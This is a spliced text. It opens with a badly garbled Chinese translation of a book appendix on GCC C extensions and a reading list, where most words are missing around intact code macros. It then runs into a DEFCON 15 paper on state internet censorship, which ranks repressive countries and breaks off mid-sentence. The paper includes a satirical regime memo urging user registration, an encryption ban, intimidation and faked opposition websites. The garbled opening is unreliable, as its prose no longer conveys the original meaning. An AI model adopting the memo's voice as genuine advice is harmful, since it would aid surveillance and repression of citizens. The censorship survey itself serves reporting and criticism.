能或操作的 ABI 作何的。
的存。的存(
的 ebx x86 的存。
时将存以的性能提。
的子。将存(virtual stack frame pointer的
存将的处。方的存
( x86 。存能
处理能程程。能设
能程存设。存的
的。
A.15 分支预测
GCC 程对式的进件
能真。相 GCC 以对进调以
件的性能。 GCC 的。
#define likely(x)
__builtin_expect (!!(x), 1)
#define unlikely(x)
__builtin_expect (!!(x), 0)
程以将式 likely() 或 unlikely() 以
式能真或能真。子示能真(
即能
– 372 –
A
GCC 对 C 的扩展
int ret;
ret = close (fd);
if (unlikely (ret))
perror (”close”);
对的子示能真
const char *home;
home = getenv (”HOME”);
if (likely (home))
printf (”Your home directory is: %s\n”,
home);
else
fprintf (stderr, ”Environment variable HOME
not set!\n”);
内程的。对
式进能式。晓
对式的( 99% 的真或的
将能真或能真。的
。
A.16 获取表达式的类型
GCC 提 typeof以给式的。上 typeof
sizeof() 的理相同。 x 的的
typeof (*x)
以的 y
typeof (*x) y[42];
– 373 –
A
GCC 对 C 的扩展
typeof 写的以操作的
的即
#define max(a,b) ({
\
typeof (a) _a = (a); \
typeof (b) _b = (b); \
_a > _b ? _a : _b; \
})
A.17 获取类型的内存对齐量
GCC 提__alignof__ 给对的对。对
ABI 。的提的对
__alignof__ ABI 的对。小对
。 sizeof 相同
__alignof__(int)
上能 4 32 4
的进对的。。的对
相的小内存对的对。 aligned 属性
小内存对(的内存对
以__alignof__ 。
以
struct ship {
int year_built;
char canons;
int mast_height;
};
段
struct ship my_ship;
– 374 –
A
GCC 对 C 的扩展
printf (”%d\n”, __alignof__(my_ship.canons));
上对的内存对能 canons 4
__alignedof__ 式将 1。
A.18 结构体中成员的偏移量
GCC 内以的的
。 offsetof() <stddef.h> ISO C 的。的
实实的操作。 GCC
的扩展更单能更
#define offsetof(type, member)
__builtin_offsetof (type, member)
上调 type member 的
的( 0 。
struct rowboat {
char *boat_name;
unsigned int nr_oars;
short length;
};
实的的小以及的对
32 上对 rowboat boat_name、 nr_oars、 length 调 off-
setof()将 0 4 8。 Linux offsetof() GCC 的
程新。
A.19 获取函数返回地址
GCC 提以(或的调的
的
void * __builtin_return_address (unsigned int
level)
– 375 –
A
GCC 对 C 的扩展
level 调(call chain的。
0 的 (f0) 的 1 的 (f0) 的 调
(f1) 的 2 的 调 f1 的 的 以
。 的 f0 内 将 f1 的 。
能 以 __builtin_return_address (
内 noinline 将 作 内 处 理。
__builtin_return_address 。以调或提。
以展调以实内、工(crash dump util-
ity、调。的。
0 能的。 0 时
的 0 调。
A.20 在 Case 中使用范围
GCC case 对单的的。的
的
case low ... high:
switch (val) {
case 1 ... 10:
/* ... */
break;
case 11 ... 20:
/* ... */
break;
default:
/* ... */
}
处理 ASCII 的 case 的时能
case ’A’ ... ’Z’:
– 376 –
A
GCC 对 C 的扩展
空。空
的时。写
case 4 ... 8:
写
case 4...8:
A.21 void 和函数指针的算术操作
GCC void 的以以。
ISO C 的存 void 的小
小真的内。进 GCC 将
内的小 1 。将 a 1
a++;
/* a void */
-Wpointer-arith上扩展时 GCC
。
A.22 让代码变得更美观并有更好的移植性
我们__attribute__ 。更的
提的扩展处理进处理。调
以对我们扩展能的。处理
的。同时以 GCC 扩展更的性
GCC(时扩展空。
的将文件文件文件
#if __GUNC__ >= 3
# undef
inline
# define inline
inline __attribute
((always_inline))
# define __noinline
__attribute__
((noinline))
– 377 –
A
GCC 对 C 的扩展
# define __pure
__attribute__ ((pure))
# define __const
__attribute__ ((const))
# define __noreturn
__attribute__
((noreturn))
# define __malloc
__attribute__ ((malloc))
# define __must_check
__attribute__
((warn_unused_result))
# define __deprecated
__attribute__
((deprecated))
# define __used
__attribute__ ((used))
# define __unused
__attribute__ ((unused))
# define __packed
__attribute__ ((packed))
# define __align(x)
__attribute__ ((aligned
(x)))
# define __align_max
__attribute__ ((aligned))
# define likely(x)
__builtin_expect (!!(x),
1)
# define unlikely(x)
__builtin_expect (!!(x),
0)
#else
# define __noinline
/* no noinline */
# define __pure
/* no pure */
# define __const
/* no const */
# define __noreturn
/* no noreturn */
# define __malloc
/* no malloc */
# define __must_check
/* no warn_unused_result
*/
# define __deprecated
/* no deprecated */
# define __used
/* no used */
# define __unused
/* no unused */
# define __packed
/* no packed */
# define __align(x)
/* no aligned */
– 378 –
A
GCC 对 C 的扩展
# define __align_max
/* no aligned_max */
# define likely(x)
(x)
# define unlikely(x)
(x)
#endif
以上的写方式将
__pure int foo (void) { /* ... */ }
GCC 上 pure 属性。的 GCC
将__pure 空(no-op。的我们以
属性同时上的。
处理更写更更的
– 379 –
B
附录 B
参考书目
程相的读, 进。读
时读作。们我相上的。
我。
的内设的读的 ( C )。
对的效 gdb Subversion(svn以及操作设
方的。的超出的 (的
程程)。内何我的。然单上
以自读。
B.1 C 语言程序设计的相关书籍
以程的 — C 。能写
C 以的(以的能方提。
以 K&R 读的。的
的 C 的单性。
The C Programming Language, 2nd ed. Brian W. Kernighan and Dennis M. Ritchie.
Prentice Hall, 1988. C 程设的作的作 C
。
C in a Nutshell. Peter Prinz and Tony Crawford. O Reilly Media, 2005.
的 C C 的。 C Pocket Reference. Peter Prinz and Ulla
Kirch-Prinz. Translated by Tony Crawford. O Reilly Media, 2002. 的
C 更新新的 ANSI C99 。 Expert C Programming. Peter
van der Linden. Prentice Hall, 1994. 对 C 的进
文作的。满
的我喜。 C Programming FAQs: Frequently Asked Questions, 2nd ed.
Steve Summit. Addison-Wesley, 1995.
超 400 C 程设的(。
FAQ C 小对的即
的 C 程。能绝对 C
– 380 –
B
上 ANSI C99(我
自的。的的
更新。
B.2 Linux 编程的相关书籍
的 Linux 程的相
的( IPC以及 pthreads Linux 程工(CVS GNU
Make以及 Subversion。
Unix Network Programming, Volume 1: The Sockets Networking API, 3rd ed. W.
Rich- ard Stevens et al. Addison-Wesley, 2003. API 的绝对
对 Linux 的更新 IPv6。
UNIX Network Programming, Volume 2: Interprocess Communications, 2nd ed. W.
Richard Stevens. Prentice Hall, 1998. 进程间(IPC的绝。
PThreads Programming: A POSIX Standard for Better Multiprocessing. Bradford
Nichols et al. O Reilly Media, 1996. POSIX 程 API—pthreads 的。
Managing Projects with GNU Make, 3rd ed. Robert Mecklenburg. O Reilly Me-
dia, 2004. GNU Make—Linux 上件的工的绝。
Essential CVS, 2nd ed.
Jennifer Versperman.
O Reilly Media, 2006.
CVS—Unix 上理的工的绝。
Version Control with Subversion. Ben Collins-Sussman et al. O Reilly Media,
2004. Subversion—Unix 上理的工的
的 Subversion 的作。
GDB Pocket Reference.
Arnold Robbins.
O Reilly Media, 2005.
gdb—Linux 调的。
Linux in a Nutshell, 5th ed. Ellen Siever et al. O Reilly Media, 2005. 对 Linux
内的 Linux 的工。
B.3 Linux 内核的相关书籍
出的及 Linux 内方的。我们理对
进。内提对空间的调。内
的性上的进时出。 Linux 内
– 381 –
B
同时。
Linux Kernel Development, 2nd ed. Robert Love. Novell Press, 2005.
给 Linux 内设实的程读(然我
提及我上的。作 API 同时对 Linux 内
的以及的的。 Linux Device Drivers, 3rd ed.
Jonathan Corbet et al. O Reilly Media, 2005. 写 Linux 内设备
程方的绝同时的 API 。对的设备
的以程 ( Linux 内的
程)。我 Linux 内方的备。
B.4 操作系统设计的相关书籍
对 Linux 的理上操作设实。
我调的对进程上的的
。
Operating Systems, 3rd ed. Harvey Deitel et al. Prentice Hall, 2003. 操作设
理方的作同时将理实的。操作
设我的操作的展读。
UNIX Systems for Modern Architectures: Symmetric Multiprocessing and Caching
for Kernel Programming. Curt Schimmel. Addison-Wesley, 1994.
程的的性存提
绝的。
– 382 – | pdf |
Greetz from Room 101
Kenneth Geers
www.chiefofstation.com
DEFCON 15
Contents: A Cyber War in Three Parts
PREFACE...............................................................................................................................................................................3
1984....................................................................................................................................................................................3
2007....................................................................................................................................................................................3
CHIEF OF STATION INTELLIGENCE REPORT .............................................................................................................4
PALACE STRATEGY.................................................................................................................................................................4
CYBER OFFICE TACTICS.......................................................................................................................................................4
NATIONAL SECURITY AND TRAFFIC ANALYSIS....................................................................................................................5
THE CORPORATE CONNECTION...............................................................................................................................................6
OUTLOOK ................................................................................................................................................................................6
EXODUS NON-GOVERNMENTAL ORGANIZATION SURVEY ..................................................................................8
THE MOST REPRESSIVE GOVERNMENTS IN CYBERSPACE......................................................................................................8
# 10 ZIMBABWE....................................................................................................................................................................8
# 09 IRAN..............................................................................................................................................................................9
# 08 SAUDI ARABIA ............................................................................................................................................................10
# 07 ERITREA......................................................................................................................................................................11
# 06 BELARUS.....................................................................................................................................................................12
# 05 BURMA........................................................................................................................................................................13
# 04 CUBA ..........................................................................................................................................................................14
# 03 CHINA .........................................................................................................................................................................15
# 02 TURKMENISTAN ..........................................................................................................................................................16
# 01 NORTH KOREA............................................................................................................................................................17
NOTES FROM THE UNDERGROUND ...............................................................................................................................19
CYBER CONTROL.................................................................................................................................................................19
CYBER RESISTANCE..........................................................................................................................................................19
RESISTANCE TOOLS............................................................................................................................................................20
THE FUTURE.......................................................................................................................................................................21
INFORMANTS...................................................................................................................................................................22
Preface
1984
Have you ever embellished a resume, or lied when you told a hot date that you were in love with
her? Guess what: you have engaged in Information Warfare. And governments are just like you
and me … only the stakes are usually much higher.
In the novel Nineteen Eighty-Four, George Orwell imagined a government that waged full-time
Information Warfare against its own people. There is a Ministry of Truth, which is in charge of
lies. Thought Police punished something called thoughtcrime, and used technology in the form of
two-way telescreens to keep an eye on everyone. Room 101, a torture chamber in the Ministry of
Love, awaits those who dare to challenge the system. There, Big Brother tries to reprogram
wayward souls. Citizen Winston Smith worked in the Ministry of Truth, rewriting history in an
attempt to match current government positions.
Truth is always stranger than fiction: there are in fact many countries on Earth today where the
only media available carry stories that are carefully crafted by government censors, and where
the government's point of view will invariably be the right one, no matter how many times it
changes. At one point in 1984, citizens are told that their country, Oceania, had always been at
war with its theretofore ally, Eastasia. Life paused for a moment, as everyone absorbed the new
reality, and then it returned to normal.
2007
Fast-forward to DEFCON 15. The indisputable power of the Internet is growing by the day.
Students, politicians, covert operatives and televangelists all agree. To military men, the Internet
is also a weapon; in a soldier's parlance, it can now kill people and break things. Privacy
advocates, law enforcement, and freedom of information warriors are all working on enormously
important Internet projects, even if they are doing so for quite different purposes.
In times past, the first thing a coup plotter had to do, just before dawn, was to seize the national
radio station. Printing presses – since they operate so much slower than radio waves – could wait
until the afternoon. The Internet has changed the rules of the game. Anyone who owns a
personal computer and a connection to the Internet has both a printing press and a radio
transmitter in their own home, and the entire world is potentially their audience. In places where
there has traditionally been only government-run radio and newspaper, the Internet is not only
the final frontier in the information space, but it can also represent a grave threat to the
continued power of a ruling government…
Who Controls the Past Controls the Future
Who Controls the Present Controls the Past
Top Sekret
Chief of Station Intelligence Report
Palace Strategy
Rule #1: Never trust the Internet. It is dynamic, chaotic, and
inherently unpredictable. The people will likely use access to the
Internet to try and bring your government down. At the Cyber Office,
our job will be to pare the Internet down to a manageable size.
Always remember that no matter what activist groups may say, there are
good reasons to filter Internet content. There is evil among us, and
it must be policed. Publicly, you can cite culture, religion, and
common sense. The two-edged sword here is that Law Enforcement tools
can be used against both common criminals and political adversaries.
From a political point of view, the Internet is the best way to
deliver political messages efficiently and directly to the people. At
the same time, software tools allow us the opportunity to deny your
rivals that same opportunity. To maximize our leverage, we must
ensure that all telecommunications are controlled by the state. If we
can do that, surveillance and even information manipulation are only a
mouse click away.
One final point. Cyber attacks are extremely hard to prove.
Evidence, especially for the common man, is scarce. If a reporter
asks, tell them that you do not even own a computer. Other
governments may occasionally ask you a question about computers, but
in reality they rarely let human rights interfere with their business
interests.
Cyber Office Tactics
The Internet itself is a Trojan horse. Now that it is allowed in our
country, there will be surprises. Modern data-hiding techniques mean
that even your official portrait, on our national homepage, could
carry a secret message within it that describes the details of a
planned coup d-etat, and we would not know it. Computer networks will
never be air-tight. Hostile network operations are inevitable from
both internal users and from the farthest corners of the planet.
If you continue to allow the Internet into this country, we are going
to need better equipment and more expertise. Some of the choices we
need to make for the country are the exact same choices that are faced
by home computer users: do we buy shrink-wrapped software or use
freeware? Do we want it highly configurable or point-and-click?
Reportedly, Burma, Belarus, Zimbabwe and Cuba have all purchased
Internet surveillance systems from the People's Republic of China
(PRC).
Most of the traditional security skills that we have hired in the past
are simply inadequate to control cyberspace. New recruits must either
possess or quickly acquire cyber expertise.
The first thing we will target is unchecked network connections. Here
are the new rules:
•
All Internet accounts must be officially registered with state
officials
•
All Internet activity must be directly attributable to individual
accounts
•
Users may not share or sell their connections
•
Users may not encrypt their communications
•
We will encourage self-censorship through physical and virtual
intimidation
•
We will manage access to international news sites, especially in
English
•
We will regulate and tax local language sites to a very high
degree
In 1991, I crossed the border from Tanzania to Malawi. My bags were
searched, and all foreign media was confiscated. If you really want
to own your information space, this type of discipline is necessary.
World history must be your history, and the future must be your
future.
Finally, we are in touch with several regimes that have common cyber
concerns. They have signaled that they are willing to share their
work with us on tactics and lessons learned.
National Security and Traffic Analysis
In theory, it is possible to read, delete, and/or modify information
“packets” based on both address and content. When our network
administrators discover a violation of the law, they simply call the
police, and after cross-checking telecommunications records, they
knock on the perpetrator’s door.
The two basic information-filtering strategies you should be aware of
are blacklisting and whitelisting. Blacklisting means removing from
the public domain any material content that is objectively wrong, such
as the words “government” and “corrupt” appearing in the same
sentence. The problem with blacklisting is that someone will find a
way to fool the system – wittingly or unwittingly – by writing
something like “our govrment is korrupt”. Therefore, whitelisting is
a more attractive way to control the information flow. The premise
here is that absolutely nothing is allowed, except that which has been
pre-approved by the state. We can give the people just enough
politics, weather, sport, and porn, and we are done.
Freedom loves pornography. In fact, there are interesting
relationships here for us to exploit. Some countries believe that
pornography is absolutely wrong and must be prohibited at all cost.
And they are quite open about this. That gives governments like ours
legitimacy in censorship. In practice, pornography is possible to
censor because sex words make great computer keywords. They are
conveniently marked “vulgar” in the dictionary. Our intention,
however, is not to block porn per se, but to give our citizens just
enough to keep them happy.
Politics are far more difficult for computers to analyze, so there is
no choice for the Cyber Office but to be ruthless. The challenge for
computers is completely different, as word recognition is not enough.
Artificial intelligence is not smart enough to place the words it sees
into context. Computers do not understand the nuances of politics.
The author's intention may have been positive feedback, constructive
criticism, humor, irony, sarcasm, or satire. Most humans don’t even
know the difference. Political censorship requires an army of subject
matter experts fluent in the local history, language, and culture.
This was difficult in ancient Egypt; in the Internet era, it is
impossible.
In the future, you will surely face the so-called Despot's Challenge,
which refers to the problem of both over- and under-censoring
citizens’ lives. In general, any censorship at all usually leads to
over-censorship. In censored countries, for example, citizens cannot
usually find a map of Middlesex County, and they have trouble finding
a recipe for marinated chicken breasts. Censored items should ideally
be double-checked by real people. Unfortunately, that is not always
practical. What we know for sure is that giving the people too much
information is always dangerous. However, if they have too little
information to work with, they may become quickly bored and restless.
The Corporate Connection
Strict government control and network packet analysis are not a match
made in heaven. Traditional methods of control, such as muscles and
truncheons, are of little use in cyberspace. Fortunately, there are
many software companies that make products we can buy off-the-shelf:
8e6, CensorNet, Content Keeper, Cyber Patrol, Cyber Sentinel,
DansGuardian, Fortinet, Internet Sheriff, K9, N2H2, Naomi, Net Nanny,
SmartFilter, squidGuard, Surf Control, We-Blocker, Websense, and more.
These products can be configured for either a schoolroom or a nation-
state. Default filters include common vices like pornography and
gambling. These companies are often the focus of privacy advocates'
criticism, but from a free market standpoint, there is a logical
defense: filtering software is politically neutral.
A good example of such software is the open source tool DansGuardian.
It is advertised as sophisticated, free Internet surveillance, and “a
cleaner, safer, place for you and your children”. Its settings can be
configured from “unobstructive” to “draconian”. With this software,
the Cyber Office can filter by technical specifications such as URL,
IP, domain, user, content, file extension, and POST. Advanced
features include PICS labeling, MIME type, regular expressions, https,
adverts, compressed HTML, intelligent algorithm matches for phrases in
mixed HTML/whitespace, and phrase-weighting, which is intended to
reduce over- and under-blocking. Furthermore, there is a whitelist
mode, and stealth mode, where access is granted to the user but an
alert is nonetheless sent to administrators.
Outlook
The Internet itself is a Trojan horse that we cannot trust. The Cyber
Office’s primary goals will be to have visibility on all network
traffic within the country, and to ensure that all political messages
come only from you. At the same time, we will deny your adversaries
the same opportunities. All citizens will have an Internet address
that can be associated with them personally. Because we own all
national telecommunications, we therefore own the entire
infrastructure, and can decide precisely who sees what information.
And censoring the Internet is only the beginning. In the future, it
will even be possible to manipulate the so-called “truth” in
cyberspace. We intend to copy the websites of our adversaries, change
the information they contain, and repost them in our country. And we
can run cyber sting operations that are designed solely to bring
cockroaches out of the woodwork. The average user knows very little
about these matters, and he will either have to trust the information
he sees, or not to trust it. Either way, we win.
Exodus Non-Governmental Organization Survey
The Most Repressive Governments in Cyberspace
This Top Ten list has been compiled using information and analysis provided by, among others,
Reporters Without Borders (www.rsf.org/), the OpenNet Initiative (opennet.net/), Freedom House
(www.freedomhouse.org/), Electronic Frontier Foundation (www.eff.org/), ITU Digital Access
Index (www.itu.int), Central Intelligence Agency (www.cia.gov), and subjective analysis of
current events. By way of example, the RSF website states that the “[a]ssessment of the situation
in each country (good, middling, difficult, serious) is based on murders, imprisonment or
harassment of cyber-dissidents or journalists, censorship of news sites, existence of independent
news sites, existence of independent ISPs and deliberately high connection charges.” The
evaluation of human rights and/or Big Brother-style cyber surveillance across the planet will be a
never-ending task. Further, the well of ignorance and misunderstanding will always be too deep
for this to be a conclusive report. Therefore, we are constantly on the lookout for corrections to
errors in both fact and judgment. That said, here are the current Exodus Top Ten:
# 10 Zimbabwe
Telecommunications in Zim were among the best in Africa, but like everything else in the
country – as the government desperately clings to power – have gone downhill precipitously.
Internet connection is available in Harare and is planned for all major towns and for some of the
smaller ones. There are two international digital gateway exchanges, in Harare and in Gweru.
One of the primary government strategies appears to try to own the gateways leading into and out
of the country. The government has purchased an Internet monitoring system from China, and is
working toward a monopoly solution for the state-owned Tel*One telecoms firm. The goal here
is two-fold: to force all communications through one pipe, for the sake of total visibility on
internal and external traffic, and to increase the cash flow into quasi-government coffers.
Legislation, including the Interception of Communications Bill (ICB), forces ISPs, some of
which have threatened to shut down in protest, to spend their Zim dollars on hardware and
software to support the government's monitoring programs. In country, there are no court
challenges to government intercepts allowed.
In October, 2006, it was reported that President Robert Mugabe's Central Intelligence
Organisation (CIO) met with the purpose of infiltrating Zim Internet service providers (ISP), in
order to “flush out” journalists who were using the Internet to feed “negative information” about
the government to international media. According to the report, police were informed that they
should to pose as cyber café attendants and Web surfers. However, they were also told that it
would be necessary for them to undergo “some computer training” first.
A police spokesman announced that the government would do “all it can” to prevent citizens
from writing “falsehoods against the government.” Jail terms for such offenses are up to 20 years
in length.
# 09 Iran
Life on the Iranian Net is already vibrant, and growing at a dizzying speed. There were 1M
Internet users in 2001, 10M today, and there could be 25M in 2009. The expansion has been
phenomenal, especially regarding the posting of Farsi-language material online. Cyber cafés and
the use of broadband are rising sharply.
While Internet surveillance in Iran is reported to be among the most sophisticated in the world,
the country’s political culture is also the most advanced in our Top Ten list, and many of the
strict rules regarding Internet usage do not appear to be routinely enforced. Cyber café
monitoring is reported to be only the occasional inspector, and while journalists are required to be
free of “moral corruption” – and anonymous publications of any sort are officially prohibited –
some news media are openly critical of the government, and the Web is the “most trusted” news
source.
Former president Ali Mohammad Khatami stated in an interview that the Iranian government
tries to have the “minimum necessary” control over the Internet. He explained that while Muslim
values would be emphasized within Iranian network space, only sites that are “truly insulting”
towards religious values would be censored. He argued that political sites which oppose official
Iranian government viewpoints were available to the public.
According to the OpenNet Initiative, however, about one-third of all websites are blocked by the
Iranian government. Among the frequently blocked sites were politics (Voice of America
www.voanews.com),
pornography,
translation,
blogging
(www.movabletype.org),
and
anonymizing software. Similar content is more likely to be blocked if in Farsi. Commercial
software known to have been used in Iran is SmartFilter by Secure Computing.
Furthermore, it is technically illegal to access “non-Islamic” Internet sites, and such offenses can
elicit severe punishments. Media receive a list of banned subjects each week, ISPs must install
mechanisms to filter Web and e-mail content, and there is a dedicated press court. Iranian
publications are not to conflict with government goals. Since 2000, 110 news outlets are reported
to have been closed, and over 40 journalists detained.
While it has been reported that Iran has engaged in widespread censorship, it has also been
alleged that the government is attempting to control user behavior to a far lesser degree. In fact,
Iranian Internet users are Net savvy. Since the year 2000, Iranian citizens have participated in a
remarkable amount of mainstream and alternative blogging. Even President Mahmud
Ahmadinejad’s has one: http://www.ahmadinejad.ir/. On the downside, at least one death threat
was lodged against blogger Hoder (Hossein Derakhshan), and hard-line newspaper Kayhan
accused the CIA of using Iranian blogs to undermine Iranian government.
On the bright side, there is significant movement inside the country limit the power of the
government in cyberspace. In August 2004, a number of reformist news sites were blocked, but
the content was quickly mirrored on other domains. In other case, an anonymous system
administrator posted an alleged official blacklist of banned sites. Even some reformist Iranian
legislators have openly complained about censorship, even online. One current trend among the
population is a rise in Real Simple Syndication (RSS) to evade blocking.
# 08 Saudi Arabia
The telecommunications system in Saudi is first-rate, encompassing extensive microwave radio
relay, coaxial cable, and submarine fiber-optic cable systems. Like Iran, Saudi Arabia boasts a
highly educated citizenry; they have been surfing the Internet since 1994.
Government authorities in Riyadh have articulated that they seek to create a “moral” Internet
through the elimination of its “negative” aspects. The primary strategy has been to require ISPs
to conform to Muslim values, traditions, and culture in order to obtain an operating license.
Upstream, the King Abdul-Aziz City for Science and Technology (KACST) represents a single,
centralized international connection from Saudi Arabia to the outside world. KACST is a
national-level proxy server uses a complicated system of cached sites, banned URLs and cyber-
triage to keep an eye on inbound and outbound traffic. Encryption is forbidden. Still, Saudi
officials have admitted that in the race between technology and bureaucracy, they struggle to
keep up. Citizens commonly use international telephone and satellite access to foreign ISPs.
To the Saudi Web surfer, censorship appears in the form of a pop-up window, warning that the
content they seek has been disallowed (in Arabic and in English) and that their request for said
information was logged by government servers (in Arabic only). Officials insist that they are
reasonable when it comes to blocking Internet sites. Included in the range of information that
OpenNet Initiative researchers have seen withheld are religion, health, education, humor,
entertainment, general reference works, computer hacking, and political activism. In Saudi
Arabia, pornography is the first thing to go. Officials contend that “all” major porn sites are
identified and blocked.
However, there is evidence that censorship is based on a strong mix of morality and politics. As
in the book 1984, “unofficial” histories of the Saudi Arabia are banned. Officially, political sites
are not supposed to be blocked, but a well-known cat-and-mouse game between Riyadh and an
anti-government group called (MIRA) tells otherwise. Initially, the government tried to block the
site by IP. The site’s owners were forced into marathon contest of hide-and-seek via IP hopping
and port randomization, while sending constantly changing addresses to its patrons by email. The
challenge was to make its readership aware of the new Web location before the authorities could
find it. On average, MIRA was able to stay ahead of the government for about a week at a time.
Web application logins reportedly made it more difficult for the government to see where its
citizens were going. Evidently, officials decided that the effort was too much work, and finally
give up.
In a Web filtering system like this, which uses a primitive type of Artificial Intelligence (AI) to
evaluate Internet sites it has never seen before, the total number or percentage of banned sites and
information cannot easily be known, but easily runs into the millions. At its most basic level,
keywords are used to recognize and block certain types of information. In order to prevent
unnecessary over-blocking, one of the unique aspects of the Saudi system is that citizens can fill
out a Blacklist Removal form (there are also Blacklist Addition forms). Thus, if an individual
thinks that certain information is being withheld from them in error, they have an efficient
appeals process. KACST management claim that they receive over 500 forms every day.
# 07 Eritrea
Oral traditions in Africa are still strong, have a historical resonance, and are widely used to foster
national solidarity. Radio and clandestine radio stations in the Horn of Africa play a vital role in
both government and anti-government forces. Recently, one sole Sudanese transmitter offered
service to three separate anti-Eritrean radio stations.
Political battles in the Eritrea are now shifting from the radio spectrum to cyberspace. Local
factions, as they appeal to the hearts, minds, wallets of their supporters, are able to reach both
regional and international audiences via the Internet. Sites such as Pan-African News
(www.africanews.org) and Eritrea Online (www.primenet.com/ephrem) feature images from the
frontlines, analysis, and everyone from African leaders to humanitarian groups making daily
statements in support of their causes.
In November 2000, Eritrea became the last African country to go online. Four ISPs shared one
national pipe and 512 kilobits per second. By 2005, the number of Internet users had grown to a
reported 70,000. However, since few Eritreans are wealthy enough to own a computer, ISPs
typically offer walk-in use. Initially, the national Telecommunications Service of Eritrea (TSE)
announced that Internet access in the country would be unimpeded, and opposition and Ethiopian
websites were accessible.
Since 2001, however, human rights in Eritrea have steadily gone downhill. There are no foreign
correspondents in the country, and prison inmates have been confined to cells consisting of cargo
containers. No International Committee of the Red Cross (ICRC) visits have been allowed. In
2004, all cyber cafés, previously only under government “supervision”, were physically
transferred to “educational and research” centers. The reason given was “pornography”, but
international diplomats were highly skeptical of the move.
Since that time, some ruling party members decided to post an announcement of a new political
party to the Web, but the posting was made from outside Eritrea.
# 06 Belarus
Life in Minsk has not changed much since the Cold War. The Presidential Administration
directly controls all information flowing through the printing press, radio, television, and now
cyberspace. Independent stations typically avoid news programming altogether, and even
Russian TV is heavily censored.
The Beltelecom state-owned monopoly is the sole provider of telephone and Internet
connectivity, although about 30 ISPs connect through Beltelecom. The only reported
independent link is through the academic network BasNet. Beltelecom has been accused of
“persecution by permit” and of requiring a demonstration of political loyalty for its services. At
least one Belarusian journalist is alleged to have “disappeared”. Strict government controls are
enforced on all telecommunications technologies. For example, transceiver satellite antennas and
IP telephony are both prohibited.
As in Zimbabwe, the Beltelecom monopoly status is intended not only for government oversight,
but also for monetary gain. It is the primary source of revenue for the Ministry of
Communications (MIC).
The State Center for Information Security (GCBI), in charge of domestic signals intelligence
(SIGINT), controls the .by Top Level Domain (TLD), and thus manages both DNS and website
access in general. Formerly part of the Belarusian KGB, GCBI also reports directly to the
President. Department “K” (for Cyber), within the Ministry of Interior, has the lead in pursuing
cyber crime. Internet surveillance mechanisms were reportedly bought from China. A common
media crime in Belarus is defaming the “honor and dignity” of state officials.
Belarus has a long history of Internet-based political battles to examine. In each of the following
years, 2001, 2003, 2004, and 2005, Internet access problems were experienced by websites
critical of the Belarusian president, state referenda, and elections. According to the government,
the problems were due simply to access overload, but the opposition claimed that no one was able
to get to the sites. One of the affected sites was characterized by the Ministry of Foreign Affairs
as “political pornography”.
The most significant cyber showdown took place during the March 2006 Belarusian presidential
elections. The opposition specifically tried to use its youth and computer savvy to organize in
cyberspace. The sitting government attempted the same, but because it supporters primarily
consisted of the rural and elderly its efforts were uphill at best.
Election day provided the world a case study in modern-day cyber politics. As Belarusians went
to the polls, up to 37 opposition media websites were inaccessible from Beltelecom. “Odd” DNS
errors were reported, and the presidential challenger’s website was diagnosed as clinically
“dead”. One week after President Lukashenka won the election by a wide margin, as anti-
government demonstrators clashed with riot police, the Internet was inaccessible from Minsk
telephone numbers. One month later, when an opposition “flash-mob” was organized over
Internet, attendees were promptly arrested by waiting policemen.
The history of political cyber warfare in Belarus demonstrates that Internet filtering and
government surveillance there may not be always be comprehensive, but can be highly focused
on specific adversaries and at critical points in time.
# 05 Burma
Out of a population of almost 50 million, the number of Internet hosts in Burma currently
reported at 42, and the number of Internet users is 78,000 (about 0.6%). For the citizen who is
lucky enough to obtain Internet access, he or she travels not on the World Wide Web but instead
to the “Myanmar Internet”, which is composed only of a small number of officially sanctioned
business websites. The two ISPs are the state Ministry of Post and Telecommunications (MPT),
and a semi-private firm called Bagan Cybertech (BC). Foreign companies and embassies are
allowed to have their own connections. A few cyber cafés exist, but because they require name,
identification number, address, and frequent screenshots of user activity, online anonymity is
virtually unattainable. Webmail, politics (i.e. Aung San Suu Kyi), anonymizers and pornography
are all blocked. Only state-sponsored e-mail accounts are allowed.
According to the 1996 Computer Science Development Law, all network-ready computers must
be registered with MPT. Failure to register a computer and/or sharing an Internet connection can
earn Burmese citizens up to 15 years in prison. Burma’s State Peace and Development Council
(SPDC) prohibits “any criticism of a non-constructive type”, "writings related to politics”,
“anything detrimental to the ideology of the state”, and “writings directly or indirectly
detrimental to the current policies and secret security affairs of the government”. Indeed,
according to Burmese law, it is fundamentally illegal to have “incorrect ideas”.
Even after all that, surveys suggest that cost is still the worst part of Internet access. In Burma,
the average annual income is $225. A broadband connection costs $1,300. The most common
form of Internet access – dial-up – costs $6 for about 10 hours. Outside Rangoon and Mandalay,
long distance fees are required. Entrance to a cyber café is $1.50.
There is very little resistance to Burma's Internet governance. On the international front, Web-
based activist groups such as the Free Burma Coalition and BurmaNet have been organizing on-
line since 1996. The data filtering company that sold its software to Burma was not keen on
public knowledge of the sale. It was reported that after the company denied any knowledge of it,
a privacy group found a picture on the Web of the Burmese Prime Minister and the company's
Sales Director, closing the deal.
# 04 Cuba
Cuba boasts a highly educated population, but unfortunately less than 2% of its citizens are
currently able to connect to the Internet. Without special authorization, private citizens are
prohibited from buying computers or accessing the Internet. The Government owns nearly all
computers on the island. Even telephone line density is less than 10 per 100 inhabitants, and
wireless access remains restricted to foreigners and regime elites.
Cuban Decree-Law 209, written in June, 1996, states that “access from the Republic of Cuba to
the Global Computer Network” will not violate “moral principles” or “jeopardise national
security”. Illegal connections to the Web can earn a prison sentence of 5 years; posting a
counter-revolutionary article, 20 years. At least two dozen journalists are now serving up to 27
years in prison. It is reported that, as in several other countries in the Exodus Top Ten, Internet
filtering and surveillance equipment were bought from China.
A human rights activist, while in Cuba, sent a test email message that contained the names of
multiple Cuban dissidents. A pop-up window announced: “This programme will close down in a
few seconds for state security reasons”, and then her computer crashed. Further, the
government’s Internet monitoring program appears to be able to target specific audiences. At the
Non-Aligned Movement summit in Havana (Sept 2006), conference attendees reported having no
problem accessing a wide variety of websites.
There are reportedly a “few” Correos de Cuba, or state-run Internet cafés. The cost for 1 hour of
access is $4.50, or about ½ the average monthly wage of $10. Use of a state-run email account is
$1.50 per hour. As a cheaper method of access, Cubans have borrowed Internet connections from
expatriates, some of whom have been summoned by the Cuban police and subsequently
threatened with expulsion from the country.
In Cuba, Internet connection codes obtained from the government are used to access the Internet
at certain times of the day. These codes are now bought and sold on a healthy cyber black
market. For Cubans desperate for information from the outside world, these codes can fetch
extraordinary sums for the impoverished country, up to a dollar a day. It was reported that
students have been expelled from school for selling their codes to others, as well as for creating
illicit chat forums. Following the incident, there was a video posted to the Web that showed
university officials announcing their punishment to a school auditorium. Since buying computer
